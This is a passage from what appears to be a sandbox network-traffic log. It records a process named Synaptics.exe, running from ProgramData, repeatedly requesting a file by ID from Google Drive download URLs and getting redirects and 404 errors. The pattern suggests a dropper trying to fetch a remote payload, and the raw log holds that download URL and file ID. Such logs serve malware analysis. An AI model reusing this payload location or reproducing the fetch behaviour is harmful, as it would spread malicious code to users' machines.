                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-6hwCT0PAm03me-gpj7T7BA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:30:13 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                            2025-01-02 19:30:13 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="OCEPhg3RHVM1sgm5wLXo-Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                            2025-01-02 19:30:13 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            110 | 192.168.2.9 | 50151 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:30:12 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:13 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:12 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-EzMuuOOPhXVgcr1B9l0dOQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            111 | 192.168.2.9 | 50155 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:30:13 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:13 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:13 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-r1vaUvNCfWvdZvKN-GEbAg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            112 | 192.168.2.9 | 50156 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:30:13 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            113 | 192.168.2.9 | 50157 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:30:13 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            114 | 192.168.2.9 | 50158 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:30:13 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            115 | 192.168.2.9 | 50162 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:30:14 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:14 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:14 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-tpqSnyXaac4-NShtB7ecFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            116 | 192.168.2.9 | 50161 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:30:14 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
2025-01-02 19:30:14 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:14 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-4jryn52bcGOuM-wBT-D2nA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
117 | 192.168.2.9 | 50160 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:30:14 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
2025-01-02 19:30:14 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC4cVAvrhCVJu55K_LZr3qAV0YlaXtPYhN8tJXMGHWQEYIf8C_2X5eurI8rXvXjWdJn_
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:14 GMT
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-qxExPVE64mQdi6e0M4cDIw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
2025-01-02 19:30:14 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2025-01-02 19:30:14 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="ioHYXWkrMwnMe9mqkKPjpQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2025-01-02 19:30:14 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
118 | 192.168.2.9 | 50164 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:30:15 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
2025-01-02 19:30:16 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC6y52_J0jto88mfOP07SpBorMSx1Iu_RDgiHwG736P_p_Lr4Vc1LAAbmIr2nXBlA_S7MBlAk7Y
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:15 GMT
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-LWn_vLWcPapakJmlyJ8Aeg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
2025-01-02 19:30:16 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2025-01-02 19:30:16 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="wmb4qu6gGBpmT3TstaQEuA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2025-01-02 19:30:16 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
119 | 192.168.2.9 | 50165 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:30:15 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
2025-01-02 19:30:15 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:15 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-87jo50peTD25xhb229eQAw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
120 | 192.168.2.9 | 50167 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:30:15 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
2025-01-02 19:30:16 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC5bB4cwJJfe-zqJSSDcZj7kt5LhGAehDGVkDYGqHRz9Y7n4H8zlRMcaPx1_YJedz7LKhfBUvpo
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:15 GMT
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-AW6cSHoVMoEIqGun_04Mow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
2025-01-02 19:30:16 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2025-01-02 19:30:16 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="pQDX5-2-dp_Fk1VgVbtGxA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2025-01-02 19:30:16 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
121 | 192.168.2.9 | 50166 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:30:15 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
2025-01-02 19:30:15 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:15 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
